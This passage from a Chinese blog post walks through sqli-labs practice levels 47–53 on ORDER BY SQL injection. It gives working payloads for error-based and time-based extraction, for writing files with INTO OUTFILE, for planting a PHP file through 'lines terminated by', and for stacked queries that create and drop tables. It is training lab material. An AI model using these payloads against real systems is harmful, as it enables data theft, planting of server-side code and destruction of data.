<p> <img src="/posts/7e37/46_5.png" srcset="/img/loading.gif" lazyload class></p>
<h2 id="Less-47"><a href="#Less-47" class="headerlink" title="Less-47"></a>Less-47</h2><p>本关的 sql 语句为：</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token variable">$sql</span> <span class="token operator">=</span> <span class="token string">"SELECT * FROM users ORDER BY '<span class="token variable">$id</span>'"</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>本关order by后为字符。</p>
<h3 id="（1）利用报错注入-1"><a href="#（1）利用报错注入-1" class="headerlink" title="（1）利用报错注入"></a>（1）利用报错注入</h3><h4 id="①获得数据库用户名-1"><a href="#①获得数据库用户名-1" class="headerlink" title="①获得数据库用户名"></a>①获得数据库用户名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

sort<span class="token operator">=</span>1' and <span class="token punctuation">(</span>updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,user<span class="token punctuation">(</span><span class="token punctuation">)</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">))</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h4 id="②获得数据库名-1"><a href="#②获得数据库名-1" class="headerlink" title="②获得数据库名"></a>②获得数据库名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload:

sort<span class="token operator">=</span>1' and <span class="token punctuation">(</span>updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,database<span class="token punctuation">(</span><span class="token punctuation">)</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">))</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h3 id="（2）利用延时注入-1"><a href="#（2）利用延时注入-1" class="headerlink" title="（2）利用延时注入"></a>（2）利用延时注入</h3><pre class="line-numbers language-bash"><code class="language-bash">payload:

sort<span class="token operator">=</span>1<span class="token string">' and (if(substr(user(),1,1)='</span>a',sleep<span class="token punctuation">(</span>5<span class="token punctuation">)</span>,0<span class="token punctuation">))</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>这里可以用burp对字符a爆破，得到数据库用户名第一个字符为r。</p>
<p> <img src="/posts/7e37/47.png" srcset="/img/loading.gif" lazyload class></p>
<h3 id="（3）导入导出文件-into-outfile-参数-1"><a href="#（3）导入导出文件-into-outfile-参数-1" class="headerlink" title="（3）导入导出文件 into outfile 参数"></a>（3）导入导出文件 into outfile 参数</h3><pre class="line-numbers language-bash"><code class="language-bash">payload：

sort<span class="token operator">=</span>1'into outfile <span class="token string">"D:\\phpStudy\\PHPTutorial\\WWW\\sqli\\Less-47\\test.txt"</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>此时查询结果已经导入到test.txt文件当中了:</p>
<p> <img src="/posts/7e37/47_2.png" srcset="/img/loading.gif" lazyload class></p>
<h3 id="（4）利用-lines-terminated-by上传木马-1"><a href="#（4）利用-lines-terminated-by上传木马-1" class="headerlink" title="（4）利用 lines terminated by上传木马"></a>（4）利用 lines terminated by上传木马</h3><pre class="line-numbers language-bash"><code class="language-bash">将<span class="token operator">&lt;</span>?php phpinfo<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>?<span class="token operator">></span>转换为十六进制：3c3f70687020706870696e666f28293b3f3e

payload:

sort<span class="token operator">=</span>1'into outfile <span class="token string">"D:\\phpStudy\\PHPTutorial\\WWW\\sqli\\Less-47\\test.php"</span>lines terminated by 0x3c3f70687020706870696e666f28293b3f3e--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>此时，可以成功访问text.php：</p>
<p> <img src="/posts/7e37/47_3.png" srcset="/img/loading.gif" lazyload class></p>
<h2 id="Less-48"><a href="#Less-48" class="headerlink" title="Less-48"></a>Less-48</h2><p>本关与Less-46的区别在于报错注入不能使用，不进行错误回显，因此其他的方法我们依旧是可以使用的。</p>
<h2 id="Less-49"><a href="#Less-49" class="headerlink" title="Less-49"></a>Less-49</h2><p>本关与Less-47关基本类似，区别在于没有错误回显，所以我们可以通过延时注入和导入文件进行注入。</p>
<h1 id="order-by的堆叠注入-Less-50-Less53"><a href="#order-by的堆叠注入-Less-50-Less53" class="headerlink" title="order by的堆叠注入(Less-50~Less53)"></a>order by的堆叠注入(Less-50~Less53)</h1><h2 id="Less-50"><a href="#Less-50" class="headerlink" title="Less-50"></a>Less-50</h2><p>前面关卡用的方法都可行。</p>
<p>这里就只主要看堆叠的增删操作吧。</p>
<h3 id="50-1添加一个表格"><a href="#50-1添加一个表格" class="headerlink" title="50.1添加一个表格"></a>50.1添加一个表格</h3><pre class="line-numbers language-bash"><code class="language-bash">payload：

sort<span class="token operator">=</span>1<span class="token punctuation">;</span>create table Less50 like <span class="token function">users</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>可以看到已经成功添加了表格Less50:</p>
<p> <img src="/posts/7e37/50.png" srcset="/img/loading.gif" lazyload class></p>
<h3 id="50-2删除一个表格"><a href="#50-2删除一个表格" class="headerlink" title="50.2删除一个表格"></a>50.2删除一个表格</h3><pre class="line-numbers language-bash"><code class="language-bash">payload:

sort<span class="token operator">=</span>1<span class="token punctuation">;</span>drop table Less50
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>可以看到已经成功删除了表格Less50:</p>
<p> <img src="/posts/7e37/50_2.png" srcset="/img/loading.gif" lazyload class></p>
<h2 id="Less-51"><a href="#Less-51" class="headerlink" title="Less-51"></a>Less-51</h2><p>跟Less-50差不多。只是多了个单引号，后面记得加注释符。</p>
<h4 id="添加一个表格："><a href="#添加一个表格：" class="headerlink" title="添加一个表格："></a>添加一个表格：</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

sort<span class="token operator">=</span>1'<span class="token punctuation">;</span>create table Less51 like users--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>可以看到已经成功添加了表格Less51:</p>
<p> <img src="/posts/7e37/51.png" srcset="/img/loading.gif" lazyload class></p>
<h2 id="Less-52"><a href="#Less-52" class="headerlink" title="Less-52"></a>Less-52</h2><p>和 less50 是一样的，只是这里的 mysql 错误不会在前台显示，但是对于堆叠注入是一样的利用方式。</p>
<h4 id="添加一个表格：-1"><a href="#添加一个表格：-1" class="headerlink" title="添加一个表格："></a>添加一个表格：</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

sort<span class="token operator">=</span>1<span class="token punctuation">;</span>create table Less52 like <span class="token function">users</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>可以看到已经成功添加了表格Less52:</p>
<p> <img src="/posts/7e37/52.png" srcset="/img/loading.gif" lazyload class></p>
<h2 id="Less-53"><a href="#Less-53" class="headerlink" title="Less-53"></a>Less-53</h2><p>和 less51 是一样的，只是这里的 mysql 错误不会在前台显示，但是对于堆叠注入是一样的利用方式。</p>
<h4 id="添加一个表格：-2"><a href="#添加一个表格：-2" class="headerlink" title="添加一个表格："></a>添加一个表格：</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

sort<span class="token operator">=</span>1'<span class="token punctuation">;</span>create table Less53 like users--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>可以看到已经成功添加了表格Less53:</p>
<img src="/posts/7e37/53.png" srcset="/img/loading.gif" lazyload class>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E9%9D%B6%E5%9C%BA/">靶场</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E9%9D%B6%E5%9C%BA/">靶场</a>
                    
                      <a class="hover-with-bg" href="/tags/sql%E6%B3%A8%E5%85%A5/">sql注入</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/posts/b894.html">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">sqli靶场(54~65关)</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/posts/fb8a.html">
                        <span class="hidden-mobile">sqli靶场(23~37关)</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  





  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>














  
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/dianjichuzi.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/xiantiao.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/timeDate.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
